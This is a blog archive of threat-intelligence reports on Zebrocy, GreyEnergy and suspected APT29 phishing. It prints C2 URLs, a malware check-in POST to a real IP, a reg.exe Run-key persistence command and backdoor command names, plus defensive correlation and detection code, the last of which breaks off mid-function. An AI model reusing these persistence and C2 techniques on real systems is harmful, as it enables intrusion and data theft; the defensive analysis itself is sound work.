Category Archives: spear-phishing

GreyEnergy’s overlap with Zebrocy

In October 2018, ESET published a report describing a set of activity they called GreyEnergy, which is believed to be a successor to BlackEnergy group. BlackEnergy (a.k.a. Sandworm) is best known, among other things, for having been involved in attacks against Ukrainian energy facilities in 2015, which led to power outages. Like its predecessor, GreyEnergy malware has been detected attacking industrial and ICS targets, mainly in Ukraine.

Kaspersky Lab ICS CERT has identified an overlap between GreyEnergy and a Sofacy subset called “Zebrocy”. The Zebrocy activity was named after malware that Sofacy group began to use since mid-November 2015 for the post-exploitation stage of attacks on its victims. Zebrocy’s targets are widely spread across the Middle East, Europe and Asia and the targets’ profiles are mostly government-related.

Both sets of activity used the same servers at the same time and targeted the same organization.

Details

Servers

In our private APT Intel report from July 2018 “Zebrocy implements new VBA anti-sandboxing tricks”, details were provided about different Zebrocy C2 servers, including 193.23.181[.]151.

In the course of our research, the following Zebrocy samples were found to use the same server to download additional components (MD5):

7f20f7fbce9deee893dbce1a1b62827d
170d2721b91482e5cabf3d2fec091151
eae0b8997c82ebd93e999d4ce14dedf5
a5cbf5a131e84cd2c0a11fca5ddaa50a
c9e1b0628ac62e5cb01bf1fa30ac8317

The URL used to download additional data looks as follows:

hxxp://193.23.181[.]151/help-desk/remote-assistant-service/PostId.php?q={hex}

This same C2 server was also used in a spearphishing email attachment sent by GreyEnergy (aka FELIXROOT), as mentioned in a FireEye report. Details on this attachment are as follows:

  • The file (11227eca89cc053fb189fac3ebf27497) with the name “Seminar.rtf” exploited CVE-2017-0199
  • “Seminar.rtf” downloaded a second stage document from: hxxp://193.23.181[.]151/Seminar.rtf (4de5adb865b5198b4f2593ad436fceff, exploiting CVE-2017-11882)
  • The original document (Seminar.rtf) was hosted on the same server and downloaded by victims from: hxxp://193.23.181[.]151/ministerstvo-energetiki/seminars/2019/06/Seminar.rtf

Another server we detected that was used both by Zebrocy and by GreyEnergy is 185.217.0[.]124. Similarly, we detected a spearphishing GreyEnergy document (a541295eca38eaa4fde122468d633083, exploiting CVE-2017-11882), also named “Seminar.rtf”.

“Seminar.rtf”, a GreyEnergy decoy document

This document downloads a GreyEnergy sample (78734cd268e5c9ab4184e1bbe21a6eb9) from the following SMB link:

\\185.217.0[.]124\Doc\Seminar\Seminar_2018_1.AO-A

The following Zebrocy samples use this server as C2:

7f20f7fbce9deee893dbce1a1b62827d
170d2721b91482e5cabf3d2fec091151
3803af6700ff4f712cd698cee262d4ac
e3100228f90692a19f88d9acb620960d

They retrieve additional data from the following URL:

hxxp://185.217.0[.]124/help-desk/remote-assistant-service/PostId.php?q={hex}

It is worth noting that at least two samples from the above list use both 193.23.181[.]151 and 185.217.0[.]124 as C2s.

Hosts associated with GreyEnergy and Zebrocy

Attacked company

Additionally, both GreyEnergy and Zebrocy spearphishing documents targeted a number of industrial companies in Kazakhstan. One of them was attacked in June 2018.

GreyEnergy and Zebrocy overlap

Attack timeframe

A spearphishing document entitled ‘Seminar.rtf’, which retrieved a GreyEnergy sample, was sent to the company approximately on June 21, 2018, followed by a Zebrocy spearphishing document sent approximately on June 28:

‘(28.06.18) Izmeneniya v prikaz PK.doc’ Zebrocy decoy document translation:
‘Changes to order, Republic of Kazakhstan’

The two C2 servers discussed above were actively used by Zebrocy and GreyEnergy almost at the same time:

  • 193.23.181[.]151 was used by GreyEnergy and Zebrocy in June 2018
  • 185.217.0[.]124 was used by GreyEnergy between May and June 2018, and by Zebrocy in June 2018
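The pivot the report performs above (which C2 hosts are shared between clusters, which samples talk to both hosts, and whether the two clusters' activity windows on a shared host overlap in time) can be carried out mechanically once the observations are tabulated. The following is an added example, not code from the Kaspersky report; the hashes and hosts are the ones listed above, while the first-seen/last-seen dates are constructed month boundaries derived from the report's "June 2018" and "May and June 2018" statements, not exact timestamps.

```python
from collections import defaultdict
from datetime import date

# Activity windows at the month granularity the report gives (constructed boundaries).
JUNE_2018 = (date(2018, 6, 1), date(2018, 6, 30))
MAY_JUNE_2018 = (date(2018, 5, 1), date(2018, 6, 30))

# (md5, cluster, C2 host, first seen, last seen), taken from the report text above.
OBSERVATIONS = [
    # Zebrocy samples downloading additional components from 193.23.181[.]151
    ("7f20f7fbce9deee893dbce1a1b62827d", "Zebrocy", "193.23.181[.]151", *JUNE_2018),
    ("170d2721b91482e5cabf3d2fec091151", "Zebrocy", "193.23.181[.]151", *JUNE_2018),
    ("eae0b8997c82ebd93e999d4ce14dedf5", "Zebrocy", "193.23.181[.]151", *JUNE_2018),
    ("a5cbf5a131e84cd2c0a11fca5ddaa50a", "Zebrocy", "193.23.181[.]151", *JUNE_2018),
    ("c9e1b0628ac62e5cb01bf1fa30ac8317", "Zebrocy", "193.23.181[.]151", *JUNE_2018),
    # GreyEnergy Seminar.rtf stages hosted on 193.23.181[.]151
    ("11227eca89cc053fb189fac3ebf27497", "GreyEnergy", "193.23.181[.]151", *JUNE_2018),
    ("4de5adb865b5198b4f2593ad436fceff", "GreyEnergy", "193.23.181[.]151", *JUNE_2018),
    # GreyEnergy decoy and payload on 185.217.0[.]124
    ("a541295eca38eaa4fde122468d633083", "GreyEnergy", "185.217.0[.]124", *MAY_JUNE_2018),
    ("78734cd268e5c9ab4184e1bbe21a6eb9", "GreyEnergy", "185.217.0[.]124", *MAY_JUNE_2018),
    # Zebrocy samples using 185.217.0[.]124 as C2
    ("7f20f7fbce9deee893dbce1a1b62827d", "Zebrocy", "185.217.0[.]124", *JUNE_2018),
    ("170d2721b91482e5cabf3d2fec091151", "Zebrocy", "185.217.0[.]124", *JUNE_2018),
    ("3803af6700ff4f712cd698cee262d4ac", "Zebrocy", "185.217.0[.]124", *JUNE_2018),
    ("e3100228f90692a19f88d9acb620960d", "Zebrocy", "185.217.0[.]124", *JUNE_2018),
]


def index_by_c2(observations):
    """Map C2 host -> cluster name -> set of sample hashes seen using it."""
    idx = defaultdict(lambda: defaultdict(set))
    for md5, cluster, c2, _first, _last in observations:
        idx[c2][cluster].add(md5)
    return idx


def shared_c2s(observations):
    """Hosts used by more than one cluster (the infrastructure overlap)."""
    return sorted(c2 for c2, clusters in index_by_c2(observations).items() if len(clusters) >= 2)


def samples_on_all(observations, hosts):
    """Samples that contact every host in `hosts` (the 'at least two samples use both' case)."""
    by_sample = defaultdict(set)
    for md5, _cluster, c2, _first, _last in observations:
        by_sample[md5].add(c2)
    return sorted(md5 for md5, seen in by_sample.items() if set(hosts) <= seen)


def activity_window(observations, c2, cluster):
    """Earliest first-seen and latest last-seen for one cluster on one host, or None."""
    spans = [(f, l) for _md5, cl, host, f, l in observations if host == c2 and cl == cluster]
    if not spans:
        return None
    return min(f for f, _ in spans), max(l for _, l in spans)


def overlap_window(observations, c2, cluster_a, cluster_b):
    """Period during which both clusters were using the same host, or None if disjoint."""
    wa = activity_window(observations, c2, cluster_a)
    wb = activity_window(observations, c2, cluster_b)
    if wa is None or wb is None:
        return None
    start, end = max(wa[0], wb[0]), min(wa[1], wb[1])
    return (start, end) if start <= end else None


if __name__ == "__main__":
    for host in shared_c2s(OBSERVATIONS):
        win = overlap_window(OBSERVATIONS, host, "GreyEnergy", "Zebrocy")
        print(host, "shared; concurrent use:", win)
    print("samples using both hosts:", samples_on_all(OBSERVATIONS, shared_c2s(OBSERVATIONS)))
```

Run against the report's data, both hosts come out as shared, the two hashes 7f20f7fb... and 170d2721... are the samples that talk to both, and the concurrent-use window on 185.217.0[.]124 is June 2018 (GreyEnergy's May start is outside Zebrocy's window). The month-level coarseness is deliberate: infrastructure-overlap claims are only as precise as the first-seen data behind them, so the window functions should be fed real telemetry timestamps before the overlap is treated as evidence.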

Conclusions

The GreyEnergy/BlackEnergy actor is an advanced group with extensive knowledge of penetrating its victims' networks and exploiting any vulnerabilities it finds. This actor has demonstrated its ability to update its tools and infrastructure in order to avoid detection, tracking, and attribution.

Though no direct evidence exists on the origins of GreyEnergy, the links between a Sofacy subset known as Zebrocy and GreyEnergy suggest that these groups are related, as has been suggested before by some public analysis. In this paper, we detailed how both groups shared the same C2 server infrastructure during a certain period of time and how they both targeted the same organization almost at the same time, which seems to confirm the relationship’s existence.

For more information about APT reports please contact: intelreports@kaspersky.com

For more information about ICS threats please contact: ics-cert@kaspersky.com

Securelist

A Zebrocy Go Downloader

Last year at SAS2018 in Cancun, Mexico, “Masha and these Bears” included discussion of a subset of Sofacy activity and malware that we call “Zebrocy”, and predictions for the decline of SPLM/XAgent Sofacy activity coinciding with the acceleration of Zebrocy activity and innovation. Zebrocy was initially introduced as a Sofacy backdoor package in 2015, but the Zebrocy cluster has carved a new approach to malware development and delivery to the world of Sofacy. In line with this approach, we will present more on this Zebrocy innovation and activity playing out at SAS 2019 in Singapore.

Our colleagues at Palo Alto recently posted an analysis of Zebrocy malware. The analysis is good and marked their first detection of a Zebrocy Go variant as October 11, 2018. Because there is much to this cluster, clarifying and adding to the discussion is always productive.

Our original “Zebrocy Innovates – Layered Spearphishing Attachments and Go Downloaders” June 2018 writeup documents the very same downloader, putting the initial deployment of Zebrocy Go downloader activity at May 10, 2018. And while the targeting in the May event was most likely different from the October event, we documented that this same Go downloader and the same C2 were used to target a Kyrgyzstan organization. Also interesting is that the exact same system was a previous Zebrocy target earlier in 2018. So, knowing that this same activity is being reported on as “new” six months later tells us a bit about the willingness of this group to re-use rare components and infrastructure across different targets.

While they are innovating with additional languages, as we predicted in early 2018, their infrastructure and individual components may have more longevity than predicted. Additionally, at the beginning of 2018, we predicted the volume of Zebrocy activity and innovation will continue to increase, while the more traditional SPLM/XAgent activity will continue to decline. Reporting on SPLM/XAgent certainly has followed this course in 2018 as SPLM/XAgent detections wind down globally, as has Sofacy’s use of this malware from our perspective.

Much of the content below is reprinted from our June document.

The Sofacy subset we identify as “Zebrocy” continues to target Central Asian government related organizations, both in-country and remote locations, along with a new middle eastern diplomatic target. And, as predicted, they continue to build out their malware set with a variety of scripts and managed code. In this case, we see new spearphishing components – an LNK file maintaining powershell scripts and a Go-implemented system information collector/downloader. This is the first time we have observed a well-known APT deploy malware with this compiled, open source language “Go”. There is much continued recent Zebrocy activity using their previously known malware set as well.

Starting in May 2018, Zebrocy spearphished Central Asian government related targets directly with this new Go downloader. For example, the attachment name included one “30-144.arj” compressed archive, an older archiver type handled by 7zip, Rar/WinRAR, and others. Users found “30-144.exe” inside the archive with an altered file icon made to look like the file was a Word document (regardless of the .exe file extension). And in a similar fashion in early June, Zebrocy spearphished over a half-dozen accounts targeting several Central Asian countries’ diplomatic organizations with a similar scheme “2018-05-Invitation-Letter(1).rar//2018-05-Invitation-Letter(pril).docx”, sending out a more common Zebrocy Delphi downloader.

In other cases, delivery of the new Go downloader was not straightforward. The new Go downloader also was delivered with a new spearphishing object that rolls up multiple layers of LNK file, powershell scripts, base64 encoded content, .docx files and the Go downloader files. The downloader is an unusually large executable at over 1.5mb, written to disk and launched by a powershell script. So the attachment that arrived over email was large.
The powershell script reads the file’s contents from a very large LNK file that was included as an email attachment, and then writes it to disk along with a Word document of the same name. So, launching the downloader is followed with the opening of an identically named decoy Word document with “WINWORD.EXE /n ***\30-276(pril).docx /o”. The downloader collects a large amount of system information and POSTs it to a known Zebrocy C2, then pulls down known Zebrocy Delphi payload code, launches it, and deletes itself.

We observed previous, somewhat similar spearphishing scenarios with an archive containing .LNK, .docx, and base64 encoded executable code, delivering offensive Finfisher objects in separate intrusion activity clusters. This activity was not Sofacy, but the spearphishing techniques were somewhat similar – the layered powershell script attachment technique is not the same, but not altogether new.

And, it is important to reiterate that these Central Asian government and diplomatic targets are often geolocated remotely. In the list of target geolocations, notice countries like South Korea, the Netherlands, etc. In addition to Zebrocy Go downloader data, this report provides data on various other observed Zebrocy malware and targets over the past three months.

Spreading

Almost all observed Zebrocy activity involves spearphishing. Spearphish attachments arrive with .rar or .arj extensions. Filename themes include official government correspondence invitations, embassy notes, and other relevant items of interest to diplomatic and government staff. Enclosed objects may be LNK, docx, or exe files.

A decoy PDF that directly targeted a Central Asian nation is included in one of the .arj attachments alongside the Go downloader. The content is titled “Possible joint projects in cooperation with the International Academy of Sciences” and lists multiple potential projects requiring international cooperation with Tajikistan and other countries. This document appears to be a legitimate one that was stolen, created mid-May 2018. While we cannot reprint potentially leaked information publicly, clearly, the document was intended for a Russian-language reader.

Powershell launcher from within LNK

The LNK containing two layers of powershell script and base64 encoded content is an unusual implementation – contents from a couple of them are listed in the technical appendix. When opened, the script opens the shortcut file it is delivered within (“30-276(pril).docx.lnk”), pulls out the base64 encoded contents (in one case, from byte 3507 to byte 6708744), base64 decodes the content and then runs another layer of the same powershell decoding. This script writes two files to disk as “30-276(pril).exe” and “30-276(pril).docx” and opens both files, leading to the launch of the Go language system information collector/downloader and a decoy Word document.

Go System Information Collector/Downloader

Md5: 333d2b9e99b36fb42f9e79a2833fad9c
Sha256: fcf03bf5ef4babce577dd13483391344e957fd2c855624c9f0573880b8cba62e
Size: 1.79mb (upx packed – 3.5mb upx unpacked)
CompiledOn: Stomped (Wed Dec 31 17:00:00 1969)
Type: PE 32-bit Go executable
Name: 30-276(pril).exe

This new Go component not only downloads and executes another Zebrocy component, but it enumerates and collects a fair amount of system data for upload to its C2, prior to downloading and executing any further modules. It simply collects data using the systeminfo utility, and in turn makes a variety of WMI calls.

After collecting system information, the backdoor calls out to POST to its hardcoded C2, in this case a hardcoded IP/Url. Note that the backdoor simply uses the default Go user-agent:
POST /technet-support/library/online-service-description.php?id_name=345XXXD5 HTTP/1.1
Host: 89.37.226.148
User-Agent: Go-http-client/1.1

With this POST, the module uploads all of the system information it just gathered with the exhaustive systeminfo utility over http: hostname, date/time, all hardware, hotfix, service and software information.

The module then retrieves the gzip’d, better known Zebrocy dropper over port 80 as part of an encoded jpg file, writes it to disk, and executes from a command line:
“cmd /C c:\users\XXX\appdata\local\Identities\{83AXXXXX-986F-1673-091A-02XXXXXXXXXX}\w32srv.exe”
and adds a run key persistence entry with the system utility reg.exe:
cmd /C “reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Driveupd /d c:\users\XXX\appdata\local\Identities\{83AXXXXX-986F-1673-091A-02XXXXXXXXXX}\w32srv.exe /f”
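The two artefacts just described, the check-in over HTTP with the default Go user-agent to a bare IP address and the Run-key persistence written through reg.exe into an appdata\local\Identities\{GUID} directory, are both cheap to look for in proxy logs and process command-line telemetry. The following is an added detection example, not code from the report; the log line format is a constructed one, the request fields and the reg.exe command line are copied from the report text above, and the remaining lines are benign filler.

```python
import re

# Constructed proxy log lines: timestamp, client, method, host, path, "user-agent".
# The first two lines reproduce the Go downloader's check-in and jpg retrieval described above.
SAMPLE_HTTP_LOG = [
    '2018-06-01T10:00:00Z 10.0.0.5 POST 89.37.226.148 /technet-support/library/online-service-description.php?id_name=345XXXD5 "Go-http-client/1.1"',
    '2018-06-01T10:00:03Z 10.0.0.5 GET 89.37.226.148 /images/photo.jpg "Go-http-client/1.1"',
    '2018-06-01T10:01:00Z 10.0.0.7 GET www.example.com /index.html "Mozilla/5.0 (Windows NT 10.0)"',
    '2018-06-01T10:02:00Z 10.0.0.9 GET api.example.org /v1/status "Go-http-client/1.1"',
]

# Constructed process command lines; the first mirrors the persistence command quoted above.
SAMPLE_CMDLINES = [
    r'cmd /C "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Driveupd /d c:\users\XXX\appdata\local\Identities\{83AXXXXX-986F-1673-091A-02XXXXXXXXXX}\w32srv.exe /f"',
    r'reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run',
    r'"C:\Program Files\Vendor\updater.exe" --check',
]

LOG_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\S+) "([^"]*)"$')
RAW_IPV4 = re.compile(r'^(?:\d{1,3}\.){3}\d{1,3}$')
# reg add <hive>\...\CurrentVersion\Run /v <name> /d <target>
RUN_KEY_ADD = re.compile(
    r'reg(?:\.exe)?\s+add\s+"?(HK\w+\\[^"\s]*\\CurrentVersion\\Run)\b.*?/v\s+(\S+).*?/d\s+(\S+)',
    re.IGNORECASE,
)
# The w32srv.exe drop location: appdata\local\Identities\{GUID}\
IDENTITIES_PATH = re.compile(r'appdata\\local\\identities\\\{[0-9a-z-]{36}\}\\', re.IGNORECASE)


def flag_http_requests(lines):
    """Return the requests matching the Go downloader's network behaviour, with reasons."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        _ts, client, method, host, path, ua = m.groups()
        reasons = []
        # Go's default client UA is rare in user traffic; combined with a raw-IP host it stands out.
        if ua.startswith("Go-http-client/") and RAW_IPV4.match(host):
            reasons.append("default Go user-agent to raw IP host")
        # The check-in URI pattern quoted in the report.
        if method == "POST" and ".php?id_name=" in path:
            reasons.append("Zebrocy Go downloader check-in URI")
        if reasons:
            hits.append({"client": client, "host": host, "path": path, "reasons": reasons})
    return hits


def flag_persistence_commands(cmdlines):
    """Return reg.exe Run-key additions, noting whether the target sits under the Identities drop path."""
    hits = []
    for cmd in cmdlines:
        m = RUN_KEY_ADD.search(cmd)
        if not m:
            continue
        key, value_name, target = m.groups()
        hits.append({
            "key": key,
            "value": value_name,
            "target": target,
            "identities_path": bool(IDENTITIES_PATH.search(target)),
        })
    return hits


if __name__ == "__main__":
    for hit in flag_http_requests(SAMPLE_HTTP_LOG):
        print("HTTP:", hit)
    for hit in flag_persistence_commands(SAMPLE_CMDLINES):
        print("PERSISTENCE:", hit)
```

The Go user-agent rule is the broad one: any Go program that does not set its own User-Agent sends Go-http-client/1.1, so on its own it will catch legitimate tooling, which is why the example only scores it when the destination is a bare IP address and pairs it with the URI pattern. The registry rule is independent of the user-agent and is the one to keep if the actor rotates C2 paths.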

Zebrocy AutoIT Dropper

Md5: 3c58ed6913593671666283cb7315dec3
Sha256: 96c3700ad639faa85982047e05fbd71c3dfd502b09f9860685498124e7dbaa46
Size: 478.5kb (upx-packed)
Compiled: Fri Apr 27 06:40:32 2018
Type: PE32 AutoIT executable
Path, Name: appdata\Identities\{83AF1378-986F-1673-091A-02681FA62C3B}\w32srv.exe

This AutoIT dropper writes out a Delphi payload, consistent with previous behavior going back to November 2015, initially described in our January 2016 report “Zebrocy – Sofacy APT Deploys New Delphi Payload”.

Zebrocy Delphi Payload

Md5: 2f83acae57f040ac486eca5890649381
Sha256: f9e96b2a453ff8922b1e858ca2d74156cb7ba5e04b3e936b77254619e6afa4e8
Size: 786kb
Compiled: Fri Jun 19 16:22:17 1992 (stomped/altered)
Type: PE32 exe [v4.7.7]
Path, Name: c:\ProgramData\Protection\Active\armpro.exe

Interestingly, the final payload reverts to an earlier version [v4.7.7]. A “TURBO” command is missing from this Zebrocy Delphi backdoor’s command list:
SYS_INFO
SCAN_ALL
SCAN_LIST
DOWNLOAD_DAY
DOWNLOAD_LIST
CREATE_FOLDER
UPLOAD_FILE
FILE_EXECUTE
DELETE_FILES
REG_WRITE_VALUE
REG_READ_VALUE
REG_DELETE_VALUE
REG_GET_KEYS_VALUES
REG_DELETE_KEY
KILL_PROCESS
CONFIG
GET_NETWORK
CMD_EXECUTE
DOWNLOAD_DATE
DELETE_FOLDER
UPLOAD_AND_EXECUTE_FILE
SCREENSHOTS
FILE_EXECUTE
SET_HIDDEN_ATTR
START
STOP
KILL_MYSELF

Infrastructure

Zebrocy backdoors are configured to directly communicate with IP assigned web server hosts over port 80, and apparently the group favors Debian Linux for this part of infrastructure: Apache 2.4.10 running on Debian Linux. A somewhat sloppy approach continues, and the group set up and configured one of the sites with digital certificates using a typical Sofacy-sounding domain that they have not yet registered: “weekpost.org”. Digital certificate details are provided in the appendix.

These “fast setup” VPS servers run in “qhoster[.]com” can be paid for with Webmoney, Bitcoin, Litecoin, Dash, Alfa Click, Qiwi, transfers from Sberbank Rossii, Svyaznoy, Promsvyazbank, and more. It appears, though, that Bitcoin and Dash may be of the most interest, as they help ensure anonymous transactions. Dataclub provides similar payment methods:

One of the VPS IP addresses (80.255.12[.]252) is hosted in the “afterburst[.]com”/Oxygem range. This service is the odd one out and is unusual because it only supports VISA/major credit cards and Paypal at checkout. If other payment options are provided, they are not a part of the public interface.

Victims and Targeting

Zebrocy Go downloader 2018 targets continue to be Central Asian government foreign policy and administrative related. Some of these organizations are geolocated in-country, or locally, and some are located remotely. In several cases, these same systems have seen multiple artefacts from Zebrocy over the course of 2017 and early 2018:
• Kazakhstan
• Kyrgyzstan
• Azerbaijan
• Tajikistan

Additional recent Zebrocy target geo-locations (targeting various Central Asian/ex-USSR local and remote government locations):
• Qatar
• Ukraine
• Czech Republic
• Mongolia
• Jordan
• Germany
• Belgium
• Iran
• Turkey
• Armenia
• Afghanistan
• South Korea
• Turkmenistan
• Kazakhstan
• Netherlands
• Kuwait
• United Arab Emirates
• Spain
• Poland
• Qatar
• Oman
• Switzerland
• Mongolia
• Kyrgyzstan
• United Kingdom

Attribution

Zebrocy activity is a known subset of Sofacy activity. We predicted that they would continue to innovate within their malware development after observing past behavior, developing with Delphi, AutoIT, .Net C#, Powershell, and now “Go” languages. Their continued targeting, phishing techniques, infrastructure setup, technique and malware innovation, and previously known backdoors help provide strong confidence that this activity continues to be Zebrocy.

Conclusions

Zebrocy continues to maintain a higher level of volume attacking local and remote ex-USSR republic Central Asian targets than other clusters of targeted Sofacy activity. Also interesting with this Sofacy sub-group is the innovation that we continue to see within their malware development. Much of the spearphishing remains thematically the same, but the remote locations of these Central Asian targets are becoming more spread out – South Korea, Netherlands, etc. While their focus has been on Windows users, it seems that we can expect the group to continue making more innovations within their malware set. Perhaps all their components will soon support all OS platforms that their targets may be using, including Linux and MacOS. Zebrocy spearphishing continues to be characteristically higher volume for a targeted attacker, and most likely that trend will continue.
And, as their spearphishing techniques progress to rival Finfisher techniques without requiring zero-day exploitation, perhaps Zebrocy will expand their duplication of more sources of open source spearphishing techniques.

IoC

Go downloader
333d2b9e99b36fb42f9e79a2833fad9c

IPs
80.255.12.252
89.37.226.148
46.183.218.34
185.77.131.110
92.114.92.128

URLs
/technet-support/library/online-service-description.php?id_name=XXXXX
/software-apptication/help-support-apl/getidpolapl.php

File – paths and names
30-276(pril).exe
30-144-(copy).exe
Embassy Note No.259.docx.lnk
2018-05-Invitation-Letter(1).rar//2018-05-Invitation-Letter(pril).docx

First Annual Cyberwarcon

Cyberwarcon is a brand new event organized yesterday in Arlington, Virginia, and delivered eight hours of fantastic content. “CyberwarCon is a one-day conference in the Washington D.C. area focused on the specter of destruction, disruption, and malicious influence on our society through cyber capabilities. We are increasingly concerned that aggressive behavior in this space is not abating and public discourse is necessary to shore up our defenses and prepare for inevitable incidents”. The list of speakers was diverse in their interests, from big data visualization technologies and analysis of social media misinformation campaigns, to incidents of Russian speaking APT in the US electrical grid. Thomas Rid keynoted with a presentation full of newly unearthed images and details on the earliest known misinformation campaign targeting the US, with some hints of what is to come for his upcoming book “Active Measures: A History of Disinformation”, certain to be another fascinating study and read. The full agenda can be found here.

Cyberwarcon badge

Our participation included my lightning talk presentation “Barely Whispering – Recent RU-speaking APT findings”. I attempted to clarify several transitively related clusters of RU-speaking APT activity and resources that we label Sofacy, BE/GreyEnergy, Zebrocy, and an advanced cluster, Hades, and introduced some data points new to public discussion about the groups. Three have exhibited disruptive and destructive behavior. It’s nice to see that some of the information I mentioned yesterday, Zebrocy’s nine month long and increasingly large wave of spearphishing, is in the news today. I briefly mentioned that their remote template spearphishing techniques, along with a switch back to the Delphi backdoor from a C# “Cannon” backdoor, was spreading to western networks. Timely stuff.

Check out the images and tweets at #CYBERWARCON. Hope to see you next year!

Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign

Introduction

  • FireEye devices detected intrusion attempts against multiple industries, including think tank, law enforcement, media, U.S. military, imagery, transportation, pharmaceutical, national government, and defense contracting.
  • The attempts involved a phishing email appearing to be from the U.S. Department of State with links to zip files containing malicious Windows shortcuts that delivered Cobalt Strike Beacon.
  • Shared technical artifacts; tactics, techniques, and procedures (TTPs); and targeting connect this activity to previously observed activity suspected to be APT29.
  • APT29 is known to transition away from phishing implants within hours of initial compromise.

On November 14, 2018, FireEye detected new targeted phishing activity at more than 20 of our clients across multiple industries.

The attacker appears to have compromised the email server of a hospital and the corporate website of a consulting company in order to use their infrastructure to send phishing emails. The phishing emails were made to look like secure communication from a Public Affairs official at the U.S. Department of State, hosted on a page made to look like another Department of State Public Affairs official's personal drive, and used a legitimate Department of State form as a decoy. This information could be obtained via publicly available data, and there is no indication that the Department of State network was involved in this campaign. The attacker used unique links in each phishing email and the links that FireEye observed were used to download a ZIP archive that contained a weaponized Windows shortcut file, launching both a benign decoy document and a Cobalt Strike Beacon backdoor, customized by the attacker to blend in with legitimate network traffic.

Several elements from this campaign – including the resources invested in the phishing email and network infrastructure, the metadata from the weaponized shortcut file payload, and the specific victim individuals and organizations targeted – are directly linked to the last observed APT29 phishing campaign from November 2016. This blog post explores those technical breadcrumbs and the possible intentions of this activity.

Attribution Challenges

Conclusive FireEye attribution is often obtained through our Mandiant consulting team's investigation of incidents at compromised organizations, to identify details of the attack and post-compromise activity at victims. FireEye is still analyzing this activity.

There are several similarities and technical overlaps between the 14 November 2018 phishing campaign and the suspected APT29 phishing campaign on 9 November 2016, both of which occurred shortly after U.S. elections. However, the new campaign included creative new elements as well as a seemingly deliberate reuse of old phishing tactics, techniques and procedures (TTPs), including using the same system to weaponize a Windows shortcut (LNK) file. APT29 is a sophisticated actor, and while sophisticated actors are not infallible, seemingly blatant mistakes are cause for pause when considering historical uses of deception by Russian intelligence services. It has also been over a year since we have conclusively identified APT29 activity, which raises questions about the timing and the similarities of the activity after such a long interlude.

Notable similarities between this and the 2016 campaign include the Windows shortcut metadata, targeted organizations and specific individuals, phishing email construction, and the use of compromised infrastructure. Notable differences include the use of Cobalt Strike, rather than custom malware; however, many espionage actors do use publicly and commercially available frameworks for reasons such as plausible deniability.

During the phishing campaign, there were indications that the site hosting the malware was selectively serving payloads. For example, requests using incorrect HTTP headers reportedly served ZIP archives containing only the benign publicly available Department of State form. It is possible that the threat actor served additional and different payloads depending on the link visited; however, FireEye has only observed two: the benign and Cobalt Strike variations.

We provide details of this in the activity summary. Analysis of the campaign is ongoing, and we welcome any additional information from the community.

Activity Summary

The threat actor crafted the phishing emails to masquerade as a U.S. Department of State Public Affairs official sharing an official document. The links led to a ZIP archive that contained a weaponized Windows shortcut file hosted on a likely compromised legitimate domain, jmj[.]com. The shortcut file was crafted to execute a PowerShell command that read, decoded, and executed additional code from within the shortcut file.

Upon execution, the shortcut file dropped a benign, publicly available, U.S. Department of State form and Cobalt Strike Beacon. Cobalt Strike is a commercially available post-exploitation framework. The BEACON payload was configured with a modified variation of the publicly available "Pandora" Malleable C2 Profile and used a command and control (C2) domain – pandorasong[.]com – assessed to be a masquerade of the Pandora music streaming service. The customization of the C2 profile may have been intended to defeat less resilient network detection methods dependent on the default configurations. The shortcut metadata indicates it was built on the same or very similar system as the shortcut used in the November 2016 campaign. The decoy content is shown in Figure 1.


Figure 1: Decoy document content

Similarities to Older Activity

This activity has TTP and targeting overlap with previous activity, suspected to be APT29. The malicious LNK used in the recent spearphishing campaign, ds7002.lnk (MD5: 6ed0020b0851fb71d5b0076f4ee95f3c), has technical overlaps with a suspected APT29 LNK from November 2016, 37486-the-shocking-truth-about-election-rigging-in-america.rtf.lnk (MD5: f713d5df826c6051e65f995e57d6817d), which was publicly reported by Volexity. The 2018 and 2016 LNK files are similar in structure and code, and contain significant metadata overlap, including the MAC address of the system on which the LNK was created.

Additional overlap was observed in the targeting and tactics employed in the phishing campaigns responsible for distributing these LNK files. Previous APT29 activity targeted some of the same recipients of this email campaign, and APT29 has leveraged large waves of emails in previous campaigns.

Outlook and Implications

Analysis of this activity is ongoing, but if the APT29 attribution is strengthened, it would be the first activity uncovered from this sophisticated group in at least a year. Given the widespread nature of the targeting, organizations that have previously been targeted by APT29 should take note of this activity. For network defenders, whether or not this activity was conducted by APT29 should be secondary to properly investigating the full scope of the intrusion, which is of critical importance if the elusive and deceptive APT29 operators indeed had access to your environment.  

Technical Details

Phishing

Emails were sent from DOSOneDriveNotifications-svCT-Mailboxe36625aaa85747214aa50342836a2315aaa36928202aa46271691a8255aaa15382822aa25821925a0245@northshorehealthgm[.]org with the subject Stevenson, Susan N shared "TP18-DS7002 (UNCLASSIFIED)" with you. The distribution of emails varied significantly between the affected organizations. While most targeted FireEye customers received three or fewer emails, some received significantly more, with one customer receiving 136.

Each phishing email contained a unique malicious URL, likely for tracking victim clicks. The pattern of this URL is shown in Figure 2.


Figure 2: Malicious URL structure

Outside of the length of the sender email address, which may have been truncated on some recipient email clients, the attacker made little effort to hide the true source of the emails, including that they were not actually sent from the Department of State. Figure 3 provides a redacted snapshot of email headers from the phishing message.


Figure 3: Redacted email headers
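Two of the details above (a sender local-part long enough to push the real domain off-screen, and lure content that names an organisation the sending domain does not belong to) are mechanical to check at the mail gateway. The following is an added example of such a triage pass, not FireEye's code: the sender address and subject are the ones reported above, the remaining headers, body text and recipient are constructed, and the link is the reported hosting prefix without the per-recipient component (the structure in Figure 2 is not reproduced here).

```python
"""Triage checks for the phishing message described above.

Added example, not FireEye's code. The sender address and subject are the ones
reported; the headers, body text and recipient are constructed, and the link is the
reported hosting prefix without the per-recipient part shown in Figure 2."""
import re
from email import message_from_string, policy
from email.utils import parseaddr
from urllib.parse import urlsplit

MAX_LOCAL_PART = 64  # RFC 5321, section 4.5.3.1.1: maximum length of the local-part
URL_RX = re.compile(r"https?://[^\s<>\"']+")


def domain_of(addr: str) -> str:
    return addr.rpartition("@")[2].lower()


def triage(raw: str, impersonated: str, impersonated_domains: set):
    """Return a list of findings. `impersonated` is the organisation the lure claims to come
    from; `impersonated_domains` are the domains that organisation actually sends from."""
    msg = message_from_string(raw, policy=policy.default)
    name, addr = parseaddr(str(msg.get("From", "")))
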